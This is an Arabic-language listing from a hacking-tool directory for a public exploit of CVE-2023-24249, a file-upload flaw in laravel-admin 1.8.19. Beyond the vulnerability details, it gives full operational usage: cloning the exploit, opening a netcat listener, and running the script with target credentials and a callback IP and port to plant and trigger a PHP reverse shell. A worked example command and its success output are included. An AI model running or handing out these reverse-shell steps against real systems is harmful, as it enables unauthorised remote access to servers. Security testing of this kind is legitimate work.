Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-24249-Exploit — إكسبلويت لـ CVE-2023-24249 - ثغرة أمنية تسمح بتنفيذ الأوامر عن بعد عبر رفع الملفات وحقن الأوامر. | Kitploit
أدوات/GitHubGitHub/iduzzel/cve-2023-24249-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubiduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

إكسبلويت لـ CVE-2023-24249 - ثغرة أمنية تسمح بتنفيذ الأوامر عن بعد عبر رفع الملفات وحقن الأوامر.

عرض المستودع
91منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-24249 سكريبت الاستغلال

الوصف

يحتوي هذا المستودع على سكريبت استغلال لـ CVE-2023-24249، وهي ثغرة أمنية حرجة موجودة في laravel-admin الإصدار 1.8.19. تسمح هذه الثغرة برفع ملفات عشوائي، مما يمكن المهاجمين من تنفيذ كود عشوائي عبر ملف PHP مصمم. يوضح سكريبت الاستغلال كيف يمكن للمهاجم رفع شل عكسي (reverse shell) إلى التطبيق المستهدف وتنفيذه للحصول على وصول عن بعد.

تفاصيل الثغرة

CVE-2023-24249 هي ثغرة رفع ملفات عشوائي في laravel-admin v1.8.19. تسمح هذه الثغرة للمهاجمين برفع وتنفيذ ملفات PHP عشوائية، مما يؤدي إلى تنفيذ كود عن بعد محتمل.

  • الدرجة الأساسية: 7.2 عالية
  • المتجه: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • تعداد الضعف: CWE-434 - رفع ملف غير مقيد يحتوي على نوع خطير

المراجع

  • استغلال - استشارة طرف ثالث
  • مستودع Laravel Admin على GitHub
  • الموقع الرسمي لـ Laravel Admin

سكريبت الاستغلال

يقوم سكريبت الاستغلال المقدم بأتمتة عملية استغلال CVE-2023-24249. يقوم بالخطوات التالية:

  1. المصادقة: تسجيل الدخول إلى التطبيق المستهدف باستخدام بيانات الاعتماد المقدمة.
  2. رفع الشل العكسي: رفع سكريبت شل عكسي PHP عبر وظيفة رفع الملفات الثغرة.
  3. تنفيذ الشل العكسي: إرسال طلب GET إلى سكريبت الشل العكسي المرفوع لتنفيذه وإنشاء اتصال يعود إلى جهاز المهاجم.

المتطلبات

  • Python 3
  • مكتبة requests
  • مكتبة beautifulsoup4

قم بتثبيت المكتبات المطلوبة باستخدام pip:

root@kitploit:~
pip install requests beautifulsoup4

الاستخدام

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
    cd CVE-2023-24249-Exploit
    
  2. ابدأ مستمعًا على جهازك:

    root@kitploit:~
    nc -lvnp <PORT>
    
  3. شغّل سكريبت الاستغلال:

    root@kitploit:~
    python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
    

    استبدل <TARGET_URL> و <USERNAME> و <PASSWORD> و <YOUR_IP> و <YOUR_PORT> بالقيم المناسبة:

    • <TARGET_URL>: عنوان URL للتطبيق المستهدف.
    • <USERNAME>: اسم المستخدم للمصادقة.
    • <PASSWORD>: كلمة المرور للمصادقة.

مثال

root@kitploit:~
python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337

مخرجات السكريبت

إذا كان الاستغلال ناجحًا، فسيقوم السكريبت بإخراج:

root@kitploit:~
[+] تم رفع الشل العكسي بنجاح! جاري محاولة تنفيذه...
[+] تم تنفيذ الشل العكسي بنجاح! تحقق من المستمع الخاص بك على <YOUR_IP>:<YOUR_PORT>

إخلاء مسؤولية

هذا السكريبت مخصص للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذا السكريبت ضد أي نظام دون إذن صريح غير قانوني وغير أخلاقي. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر يسببه هذا السكريبت.

تنزيل الأداة
  • <YOUR_IP>: عنوان IP الخاص بك لاستقبال اتصال الشل العكسي.
  • <YOUR_PORT>: المنفذ الذي يعمل عليه المستمع الخاص بك.